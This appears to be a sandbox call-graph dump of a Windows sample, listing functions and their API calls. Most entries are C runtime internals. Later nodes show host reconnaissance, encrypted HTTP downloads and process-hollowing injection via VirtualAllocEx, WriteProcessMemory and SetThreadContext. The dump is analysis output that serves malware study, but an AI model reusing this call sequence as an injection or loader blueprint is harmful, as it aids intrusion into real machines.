9219->9220 9220->9215 9222 34e888 ___crtMessageBoxA 2 API calls 9221->9222 9223 35601a 9222->9223 9224 356034 LoadLibraryA 9223->9224 9228 3560db 9223->9228 9225 356045 9224->9225 9226 35604c 9224->9226 9225->9172 9226->9225 9233 34e825 __encode_pointer 2 API calls 9226->9233 9227 35615a 9231 34e891 __decode_pointer GetModuleHandleA 9227->9231 9245 35613f 9227->9245 9228->9227 9229 34e891 __decode_pointer GetModuleHandleA 9228->9229 9232 3560fb 9229->9232 9230 34e891 __decode_pointer GetModuleHandleA 9230->9225 9236 356169 9231->9236 9235 356127 9232->9235 9238 34e891 __decode_pointer GetModuleHandleA 9232->9238 9234 356064 9233->9234 9241 34e825 __encode_pointer 2 API calls 9234->9241 9237 351514 ___crtMessageBoxA 40 API calls 9235->9237 9239 34e891 __decode_pointer GetModuleHandleA 9236->9239 9236->9245 9240 356130 9237->9240 9244 35611a 9238->9244 9239->9245 9243 34d00f __invoke_watson 10 API calls 9240->9243 9240->9245 9242 356079 9241->9242 9246 34e825 __encode_pointer 2 API calls 9242->9246 9243->9245 9244->9227 9244->9235 9245->9230 9247 35608e 9246->9247 9248 3514dd ___crtMessageBoxA 40 API calls 9247->9248 9249 35609c 9248->9249 9250 3560ac 9249->9250 9251 34d00f __invoke_watson 10 API calls 9249->9251 9250->9228 9252 34e825 __encode_pointer 2 API calls 9250->9252 9251->9250 9253 3560c3 9252->9253 9253->9228 9254 34e825 __encode_pointer 2 API calls 9253->9254 9254->9228 9256 351467 ExitProcess 9255->9256 9258 352f55 9257->9258 9259 352f68 RtlEnterCriticalSection 9257->9259 9273 352e7f 9258->9273 9259->9180 9261 352f5b 9261->9259 9299 351434 9261->9299 9265 3537bb 9264->9265 9266 34d240 9265->9266 9267 353854 9265->9267 9310 3532fa 9265->9310 9270 34d259 9266->9270 9267->9266 9317 3533aa 9267->9317 9321 352e6a RtlLeaveCriticalSection 9270->9321 9272 34d260 9272->9178 9274 352e8b ___DllMainCRTStartup 9273->9274 9275 352eb1 9274->9275 9276 35445a __FF_MSGBANNER 41 API calls 9274->9276 9277 34ff70 __malloc_crt 41 API calls 9275->9277 9283 352ec1 ___DllMainCRTStartup 9275->9283 9278 352ea0 9276->9278 9279 352ecc 9277->9279 9280 3542ba __NMSG_WRITE 41 API calls 9278->9280 9281 352ed3 9279->9281 9282 352ee2 9279->9282 9284 352ea7 9280->9284 9285 34d16a _wcsftime_l_stat 41 API calls 9281->9285 9286 352f42 __lock 41 API calls 9282->9286 9283->9261 9287 35147e _malloc 2 API calls 9284->9287 9285->9283 9288 352ee9 9286->9288 9287->9275 9289 352ef1 9288->9289 9290 352f1d 9288->9290 9292 35577b ___crtInitCritSecAndSpinCount 41 API calls 9289->9292 9291 34c707 __crtGetStringTypeA_stat 41 API calls 9290->9291 9293 352f0e 9291->9293 9294 352efc 9292->9294 9306 352f39 9293->9306 9294->9293 9296 34c707 __crtGetStringTypeA_stat 41 API calls 9294->9296 9297 352f08 9296->9297 9298 34d16a _wcsftime_l_stat 41 API calls 9297->9298 9298->9293 9300 35445a __FF_MSGBANNER 41 API calls 9299->9300 9301 351439 9300->9301 9302 3542ba __NMSG_WRITE 41 API calls 9301->9302 9303 351442 9302->9303 9304 34e891 __decode_pointer GetModuleHandleA 9303->9304 9305 35144d 9304->9305 9305->9259 9309 352e6a RtlLeaveCriticalSection 9306->9309 9308 352f40 9308->9283 9309->9308 9311 353341 RtlAllocateHeap 9310->9311 9312 35330d RtlReAllocateHeap 9310->9312 9314 35332b 9311->9314 9315 353364 VirtualAlloc 9311->9315 9313 35332f 9312->9313 9312->9314 9313->9311 9314->9267 9315->9314 9316 35337e HeapFree 9315->9316 9316->9314 9318 3533bf VirtualAlloc 9317->9318 9320 353406 9318->9320 9320->9266 9321->9272 9322->8896 9324 34e810 9323->9324 9325 34e817 9323->9325 9333 34e66d 9324->9333 9325->8925 9329 351814 9327->9329 9331 351881 9329->9331 9567 355bc9 9329->9567 9330 35197f 9330->8930 9330->8932 9331->9330 9332 355bc9 43 API calls _parse_cmdline 9331->9332 9332->9331 9334 34e679 ___DllMainCRTStartup 9333->9334 9361 34ea9b 9334->9361 9338 34e68c 9382 34e448 9338->9382 9341 34ff70 __malloc_crt 41 API calls 9342 34e6ad 9341->9342 9343 34e7cc ___DllMainCRTStartup 9342->9343 9389 34e4c2 9342->9389 9343->9325 9346 34e6dd InterlockedDecrement 9348 34e6ed 9346->9348 9353 34e6fd 9346->9353 9347 34e7d9 9347->9343 9349 34e7ec 9347->9349 9350 34c707 __crtGetStringTypeA_stat 41 API calls 9347->9350 9351 34c707 __crtGetStringTypeA_stat 41 API calls 9348->9351 9348->9353 9352 34d16a _wcsftime_l_stat 41 API calls 9349->9352 9350->9349 9351->9353 9352->9343 9353->9343 9354 352f42 __lock 41 API calls 9353->9354 9355 34e728 InterlockedDecrement 9354->9355 9357 34e7a4 9355->9357 9358 34e7b6 9355->9358 9357->9358 9359 34c707 __crtGetStringTypeA_stat 41 API calls 9357->9359 9398 34e7ce 9358->9398 9359->9358 9362 34ea18 __getptd_noexit 41 API calls 9361->9362 9363 34eaa1 9362->9363 9364 351434 __amsg_exit 41 API calls 9363->9364 9365 34e682 9363->9365 9364->9365 9366 34e3a4 9365->9366 9367 34e3b0 ___DllMainCRTStartup 9366->9367 9368 34ea9b _LocaleUpdate::_LocaleUpdate 41 API calls 9367->9368 9369 34e3b5 9368->9369 9370 352f42 __lock 41 API calls 9369->9370 9378 34e3c7 9369->9378 9371 34e3e5 9370->9371 9372 34e42e 9371->9372 9373 34e416 InterlockedIncrement 9371->9373 9374 34e3fc InterlockedDecrement 9371->9374 9401 34e43f 9372->9401 9373->9372 9374->9373 9377 34e407 9374->9377 9376 351434 __amsg_exit 41 API calls 9379 34e3d5 ___DllMainCRTStartup 9376->9379 9377->9373 9380 34c707 __crtGetStringTypeA_stat 41 API calls 9377->9380 9378->9376 9378->9379 9379->9338 9381 34e415 9380->9381 9381->9373 9405 34b3cb 9382->9405 9385 34e465 GetOEMCP 9388 34e475 9385->9388 9386 34e483 9387 34e488 GetACP 9386->9387 9386->9388 9387->9388 9388->9341 9388->9343 9390 34e448 getSystemCP 45 API calls 9389->9390 9392 34e4e0 9390->9392 9391 34e4eb setSBCS 9394 34b083 __crtGetStringTypeA_stat 5 API calls 9391->9394 9392->9391 9393 34e513 GetCPInfo 9392->9393 9397 34e526 _memset __setmbcp_nolock 9392->9397 9393->9391 9393->9397 9395 34e66b 9394->9395 9395->9346 9395->9347 9466 34e21a GetCPInfo 9397->9466 9566 352e6a RtlLeaveCriticalSection 9398->9566 9400 34e7d5 9400->9343 9404 352e6a RtlLeaveCriticalSection 9401->9404 9403 34e446 9403->9378 9404->9403 9406 34b3da 9405->9406 9410 34b427 9405->9410 9407 34ea9b _LocaleUpdate::_LocaleUpdate 41 API calls 9406->9407 9408 34b3df 9407->9408 9409 34b407 9408->9409 9413 34ca25 9408->9413 9409->9410 9412 34e3a4 _LocaleUpdate::_LocaleUpdate 43 API calls 9409->9412 9410->9385 9410->9386 9412->9410 9414 34ca31 ___DllMainCRTStartup 9413->9414 9415 34ea9b _LocaleUpdate::_LocaleUpdate 41 API calls 9414->9415 9416 34ca36 9415->9416 9417 34ca64 9416->9417 9418 34ca48 9416->9418 9419 352f42 __lock 41 API calls 9417->9419 9420 34ea9b _LocaleUpdate::_LocaleUpdate 41 API calls 9418->9420 9421 34ca6b 9419->9421 9422 34ca4d 9420->9422 9428 34c9e7 9421->9428 9425 34ca5b ___DllMainCRTStartup 9422->9425 9427 351434 __amsg_exit 41 API calls 9422->9427 9425->9409 9427->9425 9429 34c9eb ___addlocaleref ___removelocaleref 9428->9429 9431 34ca1d 9428->9431 9429->9431 9435 34c795 9429->9435 9432 34ca8f 9431->9432 9465 352e6a RtlLeaveCriticalSection 9432->9465 9434 34ca96 9434->9422 9436 34c816 9435->9436 9437 34c7a9 9435->9437 9438 34c863 9436->9438 9439 34c707 __crtGetStringTypeA_stat 41 API calls 9436->9439 9437->9436 9445 34c7dd 9437->9445 9448 34c707 __crtGetStringTypeA_stat 41 API calls 9437->9448 9441 353a72 ___free_lc_time 41 API calls 9438->9441 9456 34c88a 9438->9456 9440 34c837 9439->9440 9442 34c707 __crtGetStringTypeA_stat 41 API calls 9440->9442 9443 34c883 9441->9443 9444 34c84a 9442->9444 9449 34c707 __crtGetStringTypeA_stat 41 API calls 9443->9449 9451 34c707 __crtGetStringTypeA_stat 41 API calls 9444->9451 9452 34c707 __crtGetStringTypeA_stat 41 API calls 9445->9452 9464 34c7fe 9445->9464 9446 34c707 __crtGetStringTypeA_stat 41 API calls 9453 34c80b 9446->9453 9447 34c8c9 9454 34c707 __crtGetStringTypeA_stat 41 API calls 9447->9454 9455 34c7d2 9448->9455 9449->9456 9450 34c707 41 API calls __crtGetStringTypeA_stat 9450->9456 9457 34c858 9451->9457 9458 34c7f3 9452->9458 9459 34c707 __crtGetStringTypeA_stat 41 API calls 9453->9459 9460 34c8cf 9454->9460 9461 353c42 ___free_lconv_mon 41 API calls 9455->9461 9456->9447 9456->9450 9462 34c707 __crtGetStringTypeA_stat 41 API calls 9457->9462 9463 353c02 ___free_lconv_num 41 API calls 9458->9463 9459->9436 9460->9431 9461->9445 9462->9438 9463->9464 9464->9446 9465->9434 9467 34e2fa 9466->9467 9471 34e251 _memset 9466->9471 9470 34b083 __crtGetStringTypeA_stat 5 API calls 9467->9470 9473 34e39c 9470->9473 9476 354021 9471->9476 9473->9397 9475 355250 ___crtLCMapStringA 54 API calls 9475->9467 9477 34b3cb _LocaleUpdate::_LocaleUpdate 43 API calls 9476->9477 9478 354032 9477->9478 9486 353e69 9478->9486 9481 355250 9482 34b3cb _LocaleUpdate::_LocaleUpdate 43 API calls 9481->9482 9483 355261 9482->9483 9531 354eae 9483->9531 9487 353eb3 9486->9487 9488 353e88 GetStringTypeW 9486->9488 9489 353f9a 9487->9489 9494 353ea0 9487->9494 9490 353ea8 GetLastError 9488->9490 9488->9494 9511 355e13 GetLocaleInfoA 9489->9511 9490->9487 9492 34b083 __crtGetStringTypeA_stat 5 API calls 9495 34e2b5 9492->9495 9501 34d262 _malloc 41 API calls 9494->9501 9502 353f2e _memset __alloca_probe_16 9494->9502 9506 353f94 9494->9506 9495->9481 9496 353feb GetStringTypeA 9498 354006 9496->9498 9496->9506 9499 34c707 __crtGetStringTypeA_stat 41 API calls 9498->9499 9499->9506 9501->9502 9503 353f7d GetStringTypeW 9502->9503 9504 353f8e 9502->9504 9502->9506 9503->9504 9507 34b3b0 9504->9507 9506->9492 9508 34b3b8 9507->9508 9509 34b3c9 9507->9509 9508->9509 9510 34c707 __crtGetStringTypeA_stat 41 API calls 9508->9510 9509->9506 9510->9509 9512 355e44 9511->9512 9514 355e3f 9511->9514 9513 355a94 __tzset_nolock 48 API calls 9512->9513 9513->9514 9515 34b083 __crtGetStringTypeA_stat 5 API calls 9514->9515 9516 353fbe 9515->9516 9516->9496 9516->9506 9517 355e5a 9516->9517 9521 355e98 _strlen 9517->9521 9527 355f22 9517->9527 9518 34b083 __crtGetStringTypeA_stat 5 API calls 9519 353fdf 9518->9519 9519->9496 9519->9506 9520 34d262 _malloc 41 API calls 9522 355efa _memset __alloca_probe_16 9520->9522 9521->9520 9521->9522 9521->9527 9523 355f8e 9522->9523 9525 355f76 WideCharToMultiByte 9522->9525 9526 355f93 9522->9526 9522->9527 9524 34b3b0 __freea 41 API calls 9523->9524 9524->9527 9525->9523 9526->9523 9528 34ffb0 __calloc_crt 41 API calls 9526->9528 9527->9518 9529 355fba 9528->9529 9529->9523 9530 34c707 __crtGetStringTypeA_stat 41 API calls 9529->9530 9530->9523 9532 354ecd LCMapStringW 9531->9532 9533 354ee8 9531->9533 9532->9533 9534 354ef0 GetLastError 9532->9534 9535 3550e5 9533->9535 9546 354f42 9533->9546 9534->9533 9536 355e13 ___ansicp 49 API calls 9535->9536 9537 35510d 9536->9537 9540 355126 9537->9540 9541 355201 LCMapStringA 9537->9541 9550 3550dc 9537->9550 9538 34b083 __crtGetStringTypeA_stat 5 API calls 9539 34e2d5 9538->9539 9539->9475 9542 355e5a ___convertcp 42 API calls 9540->9542 9543 35515d 9541->9543 9552 355138 9542->9552 9544 355228 9543->9544 9545 34c707 __crtGetStringTypeA_stat 41 API calls 9543->9545 9548 34c707 __crtGetStringTypeA_stat 41 API calls 9544->9548 9544->9550 9545->9544 9547 34d262 _malloc 41 API calls 9546->9547 9546->9550 9555 354fa1 __alloca_probe_16 9546->9555 9547->9555 9548->9550 9549 35501b 9551 34b3b0 __freea 41 API calls 9549->9551 9550->9538 9551->9550 9552->9543 9552->9550 9553 34d262 _malloc 41 API calls 9552->9553 9557 355175 _memset __alloca_probe_16 9552->9557 9553->9557 9554 355093 LCMapStringW 9559 3550cd 9554->9559 9560 3550ab WideCharToMultiByte 9554->9560 9555->9549 9555->9550 9556 34d262 _malloc 41 API calls 9555->9556 9561 35505f __alloca_probe_16 9555->9561 9556->9561 9557->9543 9558 3551cf 9557->9558 9562 355e5a ___convertcp 42 API calls 9557->9562 9564 34b3b0 __freea 41 API calls 9558->9564 9563 34b3b0 __freea 41 API calls 9559->9563 9560->9559 9561->9549 9561->9554 9562->9558 9563->9549 9564->9543 9566->9400 9570 355b78 9567->9570 9571 34b3cb _LocaleUpdate::_LocaleUpdate 43 API calls 9570->9571 9572 355b89 9571->9572 9572->9329 9574 354a01 9573->9574 9575 34e825 __encode_pointer 2 API calls 9574->9575 9576 354a19 9574->9576 9575->9574 9576->8952 9580 34c22b 9577->9580 9579 34c270 9579->8954 9581 34c237 ___DllMainCRTStartup 9580->9581 9588 351493 9581->9588 9587 34c258 ___DllMainCRTStartup 9587->9579 9589 352f42 __lock 41 API calls 9588->9589 9590 34c23c 9589->9590 9591 34c14f 9590->9591 9592 34e891 __decode_pointer GetModuleHandleA 9591->9592 9593 34c15f 9592->9593 9594 34e891 __decode_pointer GetModuleHandleA 9593->9594 9595 34c170 9594->9595 9596 34c1ea 9595->9596 9609 351f0d 9595->9609 9606 34c261 9596->9606 9598 34c18a 9601 34c1ac 9598->9601 9605 34c1d5 9598->9605 9622 34fff8 9598->9622 9599 34e825 __encode_pointer 2 API calls 9599->9596 9601->9596 9602 34fff8 __realloc_crt 47 API calls 9601->9602 9603 34c1c3 9601->9603 9602->9603 9603->9596 9604 34e825 __encode_pointer 2 API calls 9603->9604 9604->9605 9605->9599 9671 35149c 9606->9671 9610 351f19 ___DllMainCRTStartup 9609->9610 9611 351f46 9610->9611 9612 351f29 9610->9612 9614 351f87 RtlSizeHeap 9611->9614 9617 352f42 __lock 41 API calls 9611->9617 9613 34d16a _wcsftime_l_stat 41 API calls 9612->9613 9616 351f2e 9613->9616 9615 351f3e ___DllMainCRTStartup 9614->9615 9615->9598 9619 34d10b _wcsftime_l_stat GetModuleHandleA 9616->9619 9618 351f56 ___sbh_find_block 9617->9618 9627 351fa7 9618->9627 9619->9615 9624 34fffc 9622->9624 9625 35003e 9624->9625 9626 35001f Sleep 9624->9626 9631 355419 9624->9631 9625->9601 9626->9624 9630 352e6a RtlLeaveCriticalSection 9627->9630 9629 351f82 9629->9614 9629->9615 9630->9629 9632 355425 ___DllMainCRTStartup 9631->9632 9633 35542c 9632->9633 9634 35543a 9632->9634 9635 34d262 _malloc 41 API calls 9633->9635 9636 355441 9634->9636 9637 35544d 9634->9637 9653 355434 _realloc ___DllMainCRTStartup 9635->9653 9638 34c707 __crtGetStringTypeA_stat 41 API calls 9636->9638 9646 3555bf 9637->9646 9666 35545a ___sbh_resize_block ___sbh_find_block 9637->9666 9638->9653 9639 3555f2 9641 351412 _realloc GetModuleHandleA 9639->9641 9640 3555c4 RtlReAllocateHeap 9640->9646 9640->9653 9643 3555f8 9641->9643 9642 352f42 __lock 41 API calls 9642->9666 9644 34d16a _wcsftime_l_stat 41 API calls 9643->9644 9644->9653 9645 355616 9648 34d16a _wcsftime_l_stat 41 API calls 9645->9648 9645->9653 9646->9639 9646->9640 9646->9645 9647 351412 _realloc GetModuleHandleA 9646->9647 9650 35560c 9646->9650 9647->9646 9649 35561f GetLastError 9648->9649 9649->9653 9652 34d16a _wcsftime_l_stat 41 API calls 9650->9652 9655 35558d 9652->9655 9653->9624 9654 3554e5 RtlAllocateHeap 9654->9666 9655->9653 9657 355592 GetLastError 9655->9657 9656 35553a RtlReAllocateHeap 9656->9666 9657->9653 9658 35378f ___sbh_alloc_block 5 API calls 9658->9666 9659 3555a5 9659->9653 9661 34d16a _wcsftime_l_stat 41 API calls 9659->9661 9660 351412 _realloc GetModuleHandleA 9660->9666 9663 3555b2 9661->9663 9662 352fe6 HeapFree ___sbh_free_block 9662->9666 9663->9649 9663->9653 9664 355588 9665 34d16a _wcsftime_l_stat 41 API calls 9664->9665 9665->9655 9666->9639 9666->9642 9666->9653 9666->9654 9666->9656 9666->9658 9666->9659 9666->9660 9666->9662 9666->9664 9667 35555d 9666->9667 9670 352e6a RtlLeaveCriticalSection 9667->9670 9669 355564 9669->9666 9670->9669 9674 352e6a RtlLeaveCriticalSection 9671->9674 9673 34c266 9673->9587 9674->9673 9676 3515ee ___DllMainCRTStartup 9675->9676 9677 352f42 __lock 41 API calls 9676->9677 9678 3515f5 9677->9678 9679 351631 _doexit 9678->9679 9681 34e891 __decode_pointer GetModuleHandleA 9678->9681 9689 35169b 9679->9689 9683 351624 9681->9683 9685 34e891 __decode_pointer GetModuleHandleA 9683->9685 9684 351698 ___DllMainCRTStartup 9684->8962 9685->9679 9687 35168f 9688 35147e _malloc 2 API calls 9687->9688 9688->9684 9690 3516a1 9689->9690 9691 35167c 9689->9691 9694 352e6a RtlLeaveCriticalSection 9690->9694 9691->9684 9693 352e6a RtlLeaveCriticalSection 9691->9693 9693->9687 9694->9691 9696 355307 ___DllMainCRTStartup 9695->9696 9697 35531f 9696->9697 9701 35533e _memset 9696->9701 9698 34d16a _wcsftime_l_stat 40 API calls 9697->9698 9699 355324 9698->9699 9702 34d10b _wcsftime_l_stat GetModuleHandleA 9699->9702 9700 3553b0 RtlAllocateHeap 9700->9701 9701->9700 9703 351412 _realloc GetModuleHandleA 9701->9703 9704 352f42 __lock 40 API calls 9701->9704 9705 355334 ___DllMainCRTStartup 9701->9705 9706 35378f ___sbh_alloc_block 5 API calls 9701->9706 9708 3553f7 9701->9708 9702->9705 9703->9701 9704->9701 9705->8971 9706->9701 9711 352e6a RtlLeaveCriticalSection 9708->9711 9710 3553fe 9710->9701 9711->9710 9712->8980 9716 352e6a RtlLeaveCriticalSection 9713->9716 9715 34ea16 9715->8986 9716->9715 9718 3532c5 9717->9718 9719 353023 9717->9719 9718->8999 9719->9718 9720 35328a HeapFree 9719->9720 9720->9718 9724 352e6a RtlLeaveCriticalSection 9721->9724 9723 34c764 9723->8988 9724->9723 9726 34eabf ___DllMainCRTStartup 9725->9726 9727 34ead7 9726->9727 9728 34c707 __crtGetStringTypeA_stat 41 API calls 9726->9728 9730 34ebb3 ___DllMainCRTStartup 9726->9730 9729 34eae5 9727->9729 9731 34c707 __crtGetStringTypeA_stat 41 API calls 9727->9731 9728->9727 9732 34eaf3 9729->9732 9734 34c707 __crtGetStringTypeA_stat 41 API calls 9729->9734 9730->9007 9731->9729 9733 34eb01 9732->9733 9735 34c707 __crtGetStringTypeA_stat 41 API calls 9732->9735 9736 34eb0f 9733->9736 9737 34c707 __crtGetStringTypeA_stat 41 API calls 9733->9737 9734->9732 9735->9733 9738 34eb1d 9736->9738 9739 34c707 __crtGetStringTypeA_stat 41 API calls 9736->9739 9737->9736 9740 34eb2e 9738->9740 9742 34c707 __crtGetStringTypeA_stat 41 API calls 9738->9742 9739->9738 9741 352f42 __lock 41 API calls 9740->9741 9743 34eb36 9741->9743 9742->9740 9744 34eb42 InterlockedDecrement 9743->9744 9750 34eb5b 9743->9750 9745 34eb4d 9744->9745 9744->9750 9748 34c707 __crtGetStringTypeA_stat 41 API calls 9745->9748 9745->9750 9748->9750 9749 352f42 __lock 41 API calls 9755 34eb6f ___removelocaleref 9749->9755 9757 34ebbf 9750->9757 9751 34eba0 9760 34ebcb 9751->9760 9754 34c707 __crtGetStringTypeA_stat 41 API calls 9754->9730 9755->9751 9756 34c795 ___freetlocinfo 41 API calls 9755->9756 9756->9751 9763 352e6a RtlLeaveCriticalSection 9757->9763 9759 34eb68 9759->9749 9764 352e6a RtlLeaveCriticalSection 9760->9764 9762 34ebad 9762->9754 9763->9759 9764->9762 8364 3419e0 8365 3419ec 8364->8365 8366 3419f1 8364->8366 8368 341870 8365->8368 8382 341390 8368->8382 8371 341390 2 API calls 8372 341895 8371->8372 8373 341390 2 API calls 8372->8373 8379 3418a5 8373->8379 8374 34197a 8374->8366 8376 34195a Sleep 8423 3415c0 8376->8423 8379->8374 8379->8376 8387 341aa0 8379->8387 8412 341630 8379->8412 8429 3414e0 8379->8429 8383 3413a7 8382->8383 8384 34139c GetProcessHeap 8382->8384 8385 3413c5 8383->8385 8386 3413b0 RtlAllocateHeap 8383->8386 8384->8383 8385->8371 8386->8385 8434 341420 8387->8434 8400 341b69 8403 3425b0 10 API calls 8400->8403 8401 341b2a 8467 3425b0 8401->8467 8405 341b88 wsprintfA 8403->8405 8406 341ba6 8405->8406 8407 341390 2 API calls 8406->8407 8411 341bb9 8406->8411 8407->8411 8408 341c4a 8408->8379 8411->8408 8473 3428d0 8411->8473 8493 342660 8411->8493 8413 34164f 8412->8413 8422 341648 8412->8422 8414 341685 8413->8414 8415 3416a0 8413->8415 8416 3416dc 8413->8416 8417 3416bf 8413->8417 8413->8422 8582 341ef0 8414->8582 8591 341f60 8415->8591 8573 341e80 8416->8573 8600 341e00 8417->8600 8422->8379 8424 3415cf 8423->8424 8425 34161e Sleep 8424->8425 8427 341630 56 API calls 8424->8427 8719 341740 8424->8719 8723 341980 8424->8723 8425->8379 8427->8424 8431 3414ed 8429->8431 8430 34154c 8430->8379 8431->8430 8432 341390 2 API calls 8431->8432 8433 341513 lstrcpyA 8432->8433 8433->8430 8435 341434 GetVersion 8434->8435 8436 342630 8435->8436 8437 342640 8436->8437 8439 341abb 8436->8439 8497 341c70 8437->8497 8440 3430f0 GetComputerNameA 8439->8440 8441 343124 lstrcatA 8440->8441 8442 343135 lstrcatA 8440->8442 8441->8442 8510 342df0 8442->8510 8445 343157 lstrcatA 8446 341acd 8445->8446 8447 342520 8446->8447 8448 342537 lstrcpyA 8447->8448 8449 34254d 8447->8449 8450 341ad9 8448->8450 8539 341fe0 8449->8539 8455 3423c0 DsEnumerateDomainTrustsA 8450->8455 8453 34258a lstrcpyA 8453->8450 8454 34256a lstrcpyA 8454->8450 8456 3423f2 8455->8456 8457 341ae8 8455->8457 8456->8457 8458 342429 lstrcatA lstrcatA 8456->8458 8459 34245b lstrcatA lstrcatA 8456->8459 8460 343400 8457->8460 8458->8456 8459->8456 8461 3414a0 8460->8461 8462 343413 GetModuleHandleA 8461->8462 8463 34342e GetProcAddress 8462->8463 8464 341b21 8462->8464 8465 343446 GetNativeSystemInfo 8463->8465 8466 34344f GetSystemInfo 8463->8466 8464->8400 8464->8401 8465->8464 8466->8464 8468 3425c4 8467->8468 8472 341b49 wsprintfA 8467->8472 8469 341390 2 API calls 8468->8469 8470 3425dd 8469->8470 8561 342cd0 CryptAcquireContextA 8470->8561 8472->8406 8474 3414a0 8473->8474 8475 3428e6 lstrlenA 8474->8475 8476 342958 InternetCrackUrlA 8475->8476 8477 34294b lstrlenA 8475->8477 8478 342975 8476->8478 8479 34296e 8476->8479 8477->8476 8478->8479 8480 3424f0 InternetOpenA 8478->8480 8479->8411 8481 34299a 8480->8481 8481->8479 8482 3429cb InternetConnectA 8481->8482 8482->8479 8483 3429fb HttpOpenRequestA 8482->8483 8484 342a29 InternetCloseHandle 8483->8484 8485 342a3a 8483->8485 8484->8479 8486 342a40 InternetQueryOptionA InternetSetOptionA 8485->8486 8487 342a79 HttpSendRequestA 8485->8487 8486->8487 8488 342aa4 HttpQueryInfoA 8487->8488 8489 342b0f InternetCloseHandle InternetCloseHandle 8487->8489 8488->8489 8490 342acd 8488->8490 8489->8479 8490->8489 8491 342ad3 InternetReadFile 8490->8491 8492 342af0 8491->8492 8492->8489 8494 34266c 8493->8494 8496 342684 8493->8496 8495 3425b0 10 API calls 8494->8495 8494->8496 8495->8496 8496->8411 8498 341390 2 API calls 8497->8498 8499 341c8e 8498->8499 8504 3413d0 8499->8504 8503 341d15 8503->8439 8505 3413dc HeapFree 8504->8505 8506 3413ef 8504->8506 8505->8506 8507 342490 GetWindowsDirectoryA 8506->8507 8508 3424b4 GetVolumeInformationA 8507->8508 8509 3424e5 8507->8509 8508->8509 8509->8503 8517 342e90 8510->8517 8515 342e84 8515->8445 8515->8446 8516 342e4c lstrcpyA lstrcatA lstrcatA 8516->8515 8518 341420 8517->8518 8519 342e9d K32EnumProcesses 8518->8519 8520 342e03 8519->8520 8522 342ebb 8519->8522 8523 343000 OpenProcess 8520->8523 8522->8520 8534 342f30 OpenProcess 8522->8534 8524 343027 OpenProcessToken 8523->8524 8533 342e45 8523->8533 8525 343045 GetTokenInformation 8524->8525 8524->8533 8526 343064 GetLastError 8525->8526 8525->8533 8527 343073 8526->8527 8526->8533 8528 341390 2 API calls 8527->8528 8529 34307c GetTokenInformation 8528->8529 8530 3430ab LookupAccountSidA 8529->8530 8531 3430d1 8529->8531 8530->8531 8532 3413d0 HeapFree 8531->8532 8532->8533 8533->8515 8533->8516 8535 342f57 K32GetProcessImageFileNameA CloseHandle 8534->8535 8536 342feb 8534->8536 8535->8536 8537 342f7f 8535->8537 8536->8522 8537->8536 8538 342fd6 lstrcpyA 8537->8538 8538->8536 8556 3414a0 8539->8556 8542 34205d 8543 342056 8542->8543 8558 3424f0 8542->8558 8543->8453 8543->8454 8546 3420b3 InternetConnectA 8546->8543 8547 3420e3 HttpOpenRequestA 8546->8547 8548 342111 InternetCloseHandle 8547->8548 8549 342122 8547->8549 8548->8543 8550 342160 HttpSendRequestA HttpQueryInfoA 8549->8550 8551 342128 InternetQueryOptionA InternetSetOptionA 8549->8551 8552 342204 InternetCloseHandle InternetCloseHandle 8550->8552 8555 3421a2 8550->8555 8551->8550 8552->8543 8553 3421ba InternetReadFile 8554 342200 8553->8554 8553->8555 8554->8552 8555->8552 8555->8553 8555->8554 8557 3414ac InternetCrackUrlA 8556->8557 8557->8542 8557->8543 8559 342082 8558->8559 8560 3424fc InternetOpenA 8558->8560 8559->8543 8559->8546 8560->8559 8562 342d12 8561->8562 8563 342d1c CryptCreateHash 8561->8563 8566 342da6 CryptDestroyHash 8562->8566 8567 342db7 8562->8567 8563->8562 8564 342d3b CryptHashData 8563->8564 8564->8562 8565 342d57 CryptDeriveKey 8564->8565 8565->8562 8568 342d7a CryptDecrypt 8565->8568 8566->8567 8569 342dbd CryptDestroyKey 8567->8569 8570 342dce 8567->8570 8568->8562 8569->8570 8571 342dd4 CryptReleaseContext 8570->8571 8572 342de7 8570->8572 8571->8572 8572->8472 8574 341390 2 API calls 8573->8574 8575 341e96 8574->8575 8609 342230 8575->8609 8577 341eba 8578 341ecf 8577->8578 8619 342b80 8577->8619 8580 3413d0 HeapFree 8578->8580 8581 341ee2 8580->8581 8581->8422 8583 341390 2 API calls 8582->8583 8584 341f06 8583->8584 8585 342230 16 API calls 8584->8585 8586 341f2a 8585->8586 8587 341f3f 8586->8587 8661 343b30 GetTempPathA GetTempFileNameA 8586->8661 8589 3413d0 HeapFree 8587->8589 8590 341f52 8589->8590 8590->8422 8592 341390 2 API calls 8591->8592 8593 341f76 8592->8593 8594 342230 16 API calls 8593->8594 8595 341f9a 8594->8595 8596 341fb7 8595->8596 8679 343880 8595->8679 8598 3413d0 HeapFree 8596->8598 8599 341fca 8598->8599 8599->8422 8601 341390 2 API calls 8600->8601 8602 341e16 8601->8602 8603 342230 16 API calls 8602->8603 8604 341e3a 8603->8604 8605 341e55 8604->8605 8694 343730 8604->8694 8606 3413d0 HeapFree 8605->8606 8608 341e68 8606->8608 8608->8422 8610 342242 8609->8610 8611 341fe0 12 API calls 8610->8611 8617 3422e0 8610->8617 8612 342262 8611->8612 8614 34226a 8612->8614 8612->8617 8613 341fe0 12 API calls 8613->8617 8615 342299 8614->8615 8632 341d40 8614->8632 8615->8577 8617->8613 8617->8615 8618 341d40 4 API calls 8617->8618 8618->8617 8620 342b96 8619->8620 8621 342b9d 8620->8621 8639 342c40 8620->8639 8621->8578 8626 342c08 8628 342c0e TerminateProcess 8626->8628 8629 342c1a CloseHandle CloseHandle 8626->8629 8628->8629 8629->8621 8631 342bfb GetProcessId 8631->8626 8633 341390 2 API calls 8632->8633 8635 341d4f RtlDecompressBuffer 8633->8635 8636 341dc2 8635->8636 8637 3413d0 HeapFree 8636->8637 8638 341ddf 8637->8638 8638->8615 8640 3414a0 8639->8640 8641 342c56 GetEnvironmentVariableA lstrcatA CreateProcessA 8640->8641 8642 342bb1 8641->8642 8642->8621 8643 343270 8642->8643 8644 3432a9 VirtualAllocEx 8643->8644 8645 3432cb VirtualAllocEx 8644->8645 8649 3432eb 8644->8649 8645->8649 8646 341390 2 API calls 8646->8649 8647 34338b 8650 342bd6 8647->8650 8651 34339a VirtualFreeEx 8647->8651 8648 3413d0 HeapFree 8648->8647 8649->8644 8649->8646 8652 34334f WriteProcessMemory 8649->8652 8653 3432f1 8649->8653 8650->8626 8654 3437e0 8650->8654 8651->8650 8652->8649 8652->8653 8653->8647 8653->8648 8655 3414a0 8654->8655 8656 343806 GetThreadContext 8655->8656 8657 343822 WriteProcessMemory 8656->8657 8658 342bf3 8656->8658 8657->8658 8659 343846 SetThreadContext 8657->8659 8658->8626 8658->8631 8659->8658 8660 343868 